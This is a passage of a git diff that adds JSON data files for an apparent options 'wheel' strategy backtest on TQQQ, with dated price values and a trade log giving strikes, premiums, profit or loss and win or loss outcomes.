630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/trades.json new file mode 100644 index 0000000..dc072ae --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/trades.json @@ -0,0 +1,2006 @@ +[ + { + "date": "2021-04-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 21.53, + "spot": 24.27460289001465, + "premium": 0.15583548330126096, + "close_cost": 0.0013175965141603296, + "pnl": 9.471788678710062, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2021-05-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.193418502807617, + "premium": 0.16538277610501684, + "close_cost": 0.06997910350015779, + "pnl": 3.5603672604859042, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 21.44, + "spot": 22.52910804748535, + "premium": 0.2048728189668081, + "close_cost": 0.025662706933038626, + "pnl": 11.941011203376945, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-05-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.73, + "spot": 23.417375564575195, + "premium": 0.2859142745403487, + "close_cost": 0.0492639407295552, + "pnl": 17.685033381079347, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-28 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.84, + "spot": 24.496671676635742, + "premium": 0.353402894070622, + "close_cost": 0.15268489637279536, + "pnl": 14.09179976978266, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-06-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.8, + "spot": 24.828577041625977, + "premium": 0.3496122706462437, + "close_cost": 0.10240690483339865, + "pnl": 18.740536581284502, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-06-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.57, + "spot": 25.87444496154785, + "premium": 0.27084203035877685, + "close_cost": 0.034165756847554185, + "pnl": 17.687627351122266, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-09-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.96, + "spot": 32.849273681640625, + "premium": 0.14406627886053336, + "close_cost": 0.015117308545511632, + "pnl": 6.914897031502171, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 31.06, + "spot": 28.424640655517578, + "premium": 0.12741045707574195, + "close_cost": 2.6353593444824206, + "pnl": -253.78488874066787, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 28.99, + "spot": 29.76420783996582, + "premium": 0.6224754915857851, + "close_cost": 0.7742078399658219, + "pnl": -18.16323483800368, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.98, + "spot": 30.151033401489258, + "premium": 0.328993695135388, + "close_cost": 0.15903912731368752, + "pnl": 11.015456782170048, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.37, + "spot": 34.002586364746094, + "premium": 0.37081426779889437, + "close_cost": 0.149875506878538, + "pnl": 16.113876092035635, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.66, + "spot": 35.07233810424805, + "premium": 0.38871639204830455, + "close_cost": 0.13603695024602835, + "pnl": 19.28794418022762, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.7, + "spot": 38.291114807128906, + "premium": 0.16040034889961508, + "close_cost": 0.061078341968788585, + "pnl": 3.9522006930826485, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.38, + "spot": 40.79117202758789, + "premium": 0.13996737518304947, + "close_cost": 0.0, + "pnl": 8.016737518304947, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.34, + "spot": 36.674564361572266, + "premium": 0.307400439930805, + "close_cost": 1.6654356384277378, + "pnl": -138.7935198496933, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-12-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 37.41, + "spot": 38.2696418762207, + "premium": 0.9146664056948524, + "close_cost": 0.8596418762207065, + "pnl": 2.512452947414582, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.97, + "spot": 39.587703704833984, + "premium": 0.6238178644723504, + "close_cost": 0.27060195194176195, + "pnl": 29.341591253058848, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-12-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.84, + "spot": 37.266746520996094, + "premium": 0.7326953725219969, + "close_cost": 0.26081434114122537, + "pnl": 41.20810313807715, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.92, + "spot": 40.862815856933594, + "premium": 0.9664354475146091, + "close_cost": 0.0, + "pnl": 90.6635447514609, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-01-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.41, + "spot": 34.52790832519531, + "premium": 0.7459474407784921, + "close_cost": 3.882091674804684, + "pnl": -316.6044234026192, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.22, + "spot": 31.84877586364746, + "premium": 1.1811480469235907, + "close_cost": 0.0, + "pnl": 112.13480469235905, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2022-01-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 32.49, + "spot": 29.551692962646484, + "premium": 1.0857040716949093, + "close_cost": 0.17374523286865617, + "pnl": 85.2158838826253, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-01-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 30.14, + "spot": 27.06357765197754, + "premium": 0.9261447656194512, + "close_cost": 0.1845473413777512, + "pnl": 68.17974242417, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-25 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 27.6, + "spot": 25.43031120300293, + "premium": 0.8934352492402251, + "close_cost": 0.08866988258488906, + "pnl": 74.4965366655336, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-01 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 25.94, + "spot": 30.091337203979492, + "premium": 0.7967881568573834, + "close_cost": 4.151337203979491, + "pnl": -338.44490471221076, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-02-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.29, + "spot": 28.329120635986328, + "premium": 0.8336827512703948, + "close_cost": 0.0, + "pnl": 77.38827512703948, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.63, + "spot": 30.086559295654297, + "premium": 0.8934033047757364, + "close_cost": 0.4022507502143897, + "pnl": 43.13525545613466, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 25.72, + "spot": 23.343353271484375, + "premium": 0.9722962480947945, + "close_cost": 2.376646728515624, + "pnl": -143.42504804208295, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-01 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.81, + "spot": 23.897327423095703, + "premium": 1.2690626452641443, + "close_cost": 0.0873274230957044, + "pnl": 112.19352221684399, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 24.38, + "spot": 20.40155601501465, + "premium": 1.2428168870769483, + "close_cost": 0.0003322279161910337, + "pnl": 118.26846591607573, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-03-14 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.81, + "spot": 19.035724639892578, + "premium": 1.056512135954378, + "close_cost": 0.0, + "pnl": 99.6712135954378, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 19.42, + "spot": 25.21063232421875, + "premium": 1.000416247728733, + "close_cost": 5.790632324218748, + "pnl": -482.0116076490015, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.7, + "spot": 27.230728149414062, + "premium": 0.9956691271693927, + "close_cost": 0.19335513684005123, + "pnl": 74.25139903293415, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-04-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.72, + "spot": 29.394092559814453, + "premium": 1.0369175679068654, + "close_cost": 0.0, + "pnl": 97.71175679068654, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-11 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 27.63, + "spot": 22.99950408935547, + "premium": 0.8649930519021414, + "close_cost": 4.63049591064453, + "pnl": -379.5402858742389, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-04-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.46, + "spot": 22.507614135742188, + "premium": 1.1031360613910923, + "close_cost": 0.0, + "pnl": 104.33360613910922, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-22 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 22.96, + "spot": 19.823701858520508, + "premium": 0.8969338883173066, + "close_cost": 0.025704292182083255, + "pnl": 81.14295961352232, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-04-26 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.22, + "spot": 18.247737884521484, + "premium": 0.8189177139434332, + "close_cost": 0.10424915567482573, + "pnl": 65.48685582686073, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.61, + "spot": 18.30982208251953, + "premium": 0.8275315207607665, + "close_cost": 0.0, + "pnl": 76.77315207607664, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-09 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.68, + "spot": 14.575267791748047, + "premium": 1.0004715984032329, + "close_cost": 0.00010121678925023667, + "pnl": 94.05703816139825, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-05-16 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.87, + "spot": 14.637351036071777, + "premium": 0.9919112993955066, + "close_cost": 0.0, + "pnl": 93.21112993955066, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.93, + "spot": 13.056612014770508, + "premium": 1.061477857267028, + "close_cost": 0.17573654538225147, + "pnl": 82.59413118847765, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-27 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.32, + "spot": 15.898124694824219, + "premium": 0.9972686806723319, + "close_cost": 2.5781246948242185, + "pnl": -161.07560141518866, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.94, + "spot": 16.667003631591797, + "premium": 0.8256466414204207, + "close_cost": 0.03843309745641155, + "pnl": 72.74135439640091, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-06-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.43, + "spot": 15.917224884033203, + "premium": 0.6981343490116458, + "close_cost": 0.17784893279181757, + "pnl": 46.04854162198282, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-06-17 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.03, + "spot": 10.826384544372559, + "premium": 0.5613366764115577, + "close_cost": 1.2036154556274408, + "pnl": -67.2178779215883, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-24 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.04, + "spot": 13.362252235412598, + "premium": 0.6866274796231897, + "close_cost": 2.3222522354125985, + "pnl": -166.55247557894089, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-01 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.56, + "spot": 11.647796630859375, + "premium": 0.6321776272516466, + "close_cost": 0.9122033691406255, + "pnl": -30.99257418889789, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-08 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.88, + "spot": 13.3192720413208, + "premium": 0.708480825844684, + "close_cost": 1.4392720413208, + "pnl": -76.0691215476116, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.52, + "spot": 12.793951988220215, + "premium": 0.5669064723350159, + "close_cost": 0.0, + "pnl": 50.71064723350159, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-07-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.03, + "spot": 13.591484069824219, + "premium": 0.37979551696620195, + "close_cost": 0.03423856844960038, + "pnl": 28.575694851660156, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-07-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.26, + "spot": 14.680333137512207, + "premium": 0.35997474866705037, + "close_cost": 0.027885858502483596, + "pnl": 27.22888901645668, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.98, + "spot": 17.020397186279297, + "premium": 0.3889090336973622, + "close_cost": 0.014972277044941085, + "pnl": 31.413675665242106, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 15.68, + "spot": 17.43110466003418, + "premium": 0.3862202726902675, + "close_cost": 0.1543147877711255, + "pnl": 17.2105484919142, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-08-24 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 16.74, + "spot": 15.621135711669922, + "premium": 0.41641631423561787, + "close_cost": 1.1188642883300766, + "pnl": -73.23479740944586, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-08-29 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 15.93, + "spot": 13.99741268157959, + "premium": 0.5312373659999707, + "close_cost": 0.011324325589380568, + "pnl": 46.01130404105902, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-02 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.28, + "spot": 12.741419792175293, + "premium": 0.5889763982857863, + "close_cost": 0.03251556484156848, + "pnl": 49.66608334442178, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-09-09 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.0, + "spot": 14.25052547454834, + "premium": 0.48822847349682164, + "close_cost": 1.2505254745483398, + "pnl": -79.21970010515182, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.4, + "spot": 14.771071434020996, + "premium": 0.3228255255555341, + "close_cost": 0.08620143406403646, + "pnl": 17.682409149149766, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.04, + "spot": 12.029850006103516, + "premium": 0.3694817907972925, + "close_cost": 0.16012302481664475, + "pnl": 14.955876598064773, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.57, + "spot": 10.047958374023438, + "premium": 0.29255483173446395, + "close_cost": 0.13631890675553926, + "pnl": 9.643592497892469, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-10-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.67, + "spot": 9.866482734680176, + "premium": 0.26542259640453203, + "close_cost": 0.06098804400291069, + "pnl": 14.463455240162133, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.75, + "spot": 9.221770286560059, + "premium": 0.3243665439300334, + "close_cost": 0.03489370975104489, + "pnl": 22.96728341789885, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-10-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 7.89, + "spot": 9.21699333190918, + "premium": 0.2476488970625792, + "close_cost": 0.0410416150599463, + "pnl": 14.680728200263289, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.23, + "spot": 10.157796859741211, + "premium": 0.3368323986117989, + "close_cost": 0.1334847960137926, + "pnl": 14.354760259800631, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-11-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 9.74, + "spot": 8.572281837463379, + "premium": 0.3787269441428016, + "close_cost": 1.1677181625366213, + "pnl": -81.88912183938196, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.74, + "spot": 10.826384544372559, + "premium": 0.45004108162632317, + "close_cost": 2.0863845443725584, + "pnl": -166.62434627462352, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.18, + "spot": 10.964879989624023, + "premium": 0.5100878837005149, + "close_cost": 0.2107241229802752, + "pnl": 23.956376072023975, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.8, + "spot": 10.539847373962402, + "premium": 0.4625412645918683, + "close_cost": 0.19892429268866874, + "pnl": 20.381697190319954, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.99, + "spot": 11.251418113708496, + "premium": 0.44017292006936604, + "close_cost": 0.05681933937403305, + "pnl": 32.355358069533295, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-09 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 10.51, + "spot": 9.976322174072266, + "premium": 0.4301961670505703, + "close_cost": 0.5336778259277342, + "pnl": -13.338165887716388, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-12-15 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.18, + "spot": 9.379364967346191, + "premium": 0.37559546754213624, + "close_cost": 0.007341691445240606, + "pnl": 30.84537760968956, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-12-19 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.57, + "spot": 8.725103378295898, + "premium": 0.3798960594277361, + "close_cost": 0.049846055242742215, + "pnl": 27.025000418499385, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-12-27 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.9, + "spot": 8.083925247192383, + "premium": 0.3626311845996204, + "close_cost": 0.0, + "pnl": 30.283118459962044, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2023-01-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.25, + "spot": 8.117527961730957, + "premium": 0.3426797547472238, + "close_cost": 0.0, + "pnl": 28.287975474722376, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-01-10 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.28, + "spot": 8.875999450683594, + "premium": 0.28144752943409257, + "close_cost": 0.5959994506835944, + "pnl": -34.44519212495018, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.28, + "spot": 11.97707748413086, + "premium": 0.285592287094095, + "close_cost": 0.08277220440874089, + "pnl": 14.302008268535413, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2023-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 11.76, + "spot": 10.738566398620605, + "premium": 0.2976773036967266, + "close_cost": 1.0214336013793943, + "pnl": -75.36562976826677, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-28 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.95, + "spot": 10.623353958129883, + "premium": 0.4503068353930404, + "close_cost": 0.0753674259177215, + "pnl": 31.51394094753189, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.84, + "spot": 10.887377738952637, + "premium": 0.4193265890313089, + "close_cost": 0.04737773895263686, + "pnl": 31.214885007867206, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.11, + "spot": 10.023299217224121, + "premium": 0.3368567342637183, + "close_cost": 0.024416412783867414, + "pnl": 25.26403214798509, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 10.22, + "spot": 11.794658660888672, + "premium": 0.28971152047022475, + "close_cost": 1.5746586608886712, + "pnl": -131.48471404184465, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.76, + "spot": 16.7550048828125, + "premium": 0.21085329133306585, + "close_cost": 0.024722739136189054, + "pnl": 12.63305521968768, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2023-11-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 17.37, + "spot": 18.99580955505371, + "premium": 0.25301105306378524, + "close_cost": 0.12482886242702351, + "pnl": 6.838219063676172, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2023-11-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.46, + "spot": 20.872055053710938, + "premium": 0.29332598753469874, + "close_cost": 0.08608607004532187, + "pnl": 14.743991748937685, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.09, + "spot": 23.8001766204834, + "premium": 0.12668356236508016, + "close_cost": 0.0003487592221401714, + "pnl": 6.653480314293999, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-01-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.429969787597656, + "premium": 0.15674734561283277, + "close_cost": 0.06725268429805364, + "pnl": 2.969466131477912, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.09, + "spot": 25.172046661376953, + "premium": 0.13557618285315343, + "close_cost": 0.04083128435259198, + "pnl": 3.4944898500561443, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.16, + "spot": 26.607379913330078, + "premium": 0.19947329834256777, + "close_cost": 0.05356146538708173, + "pnl": 8.611183295548603, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.04, + "spot": 28.579742431640625, + "premium": 0.2521820450388468, + "close_cost": 0.09035638617245612, + "pnl": 10.202565886639068, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.74, + "spot": 29.375518798828125, + "premium": 0.2107043321928277, + "close_cost": 0.02959364703684808, + "pnl": 12.13106851559796, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.49, + "spot": 29.468284606933594, + "premium": 0.3288692430475395, + "close_cost": 0.13676223718978253, + "pnl": 13.230700585775697, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.09, + "spot": 30.664392471313477, + "premium": 0.29630503535239505, + "close_cost": 0.03435946611475105, + "pnl": 20.214556923764402, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.4, + "spot": 28.99471664428711, + "premium": 0.385988922645371, + "close_cost": 0.1547327224120627, + "pnl": 17.145620023330828, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-03-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.44, + "spot": 30.231168746948242, + "premium": 0.33860635166218955, + "close_cost": 0.13295871255331448, + "pnl": 14.584763910887506, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.28, + "spot": 30.34876251220703, + "premium": 0.24281183179998678, + "close_cost": 0.0006781752938372076, + "pnl": 18.233365650614957, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-04-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.76, + "spot": 29.731403350830078, + "premium": 0.19864000350490674, + "close_cost": 0.09195610059476866, + "pnl": 4.688390291013807, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.87, + "spot": 30.231168746948242, + "premium": 0.1314968635492315, + "close_cost": 0.03716441872662557, + "pnl": 3.453244482260594, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.69, + "spot": 26.061521530151367, + "premium": 0.1753488457691832, + "close_cost": 0.0, + "pnl": 11.554884576918319, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-04-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.5, + "spot": 27.08555793762207, + "premium": 0.2620810823874242, + "close_cost": 0.046312624963059434, + "pnl": 15.596845742436479, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.29, + "spot": 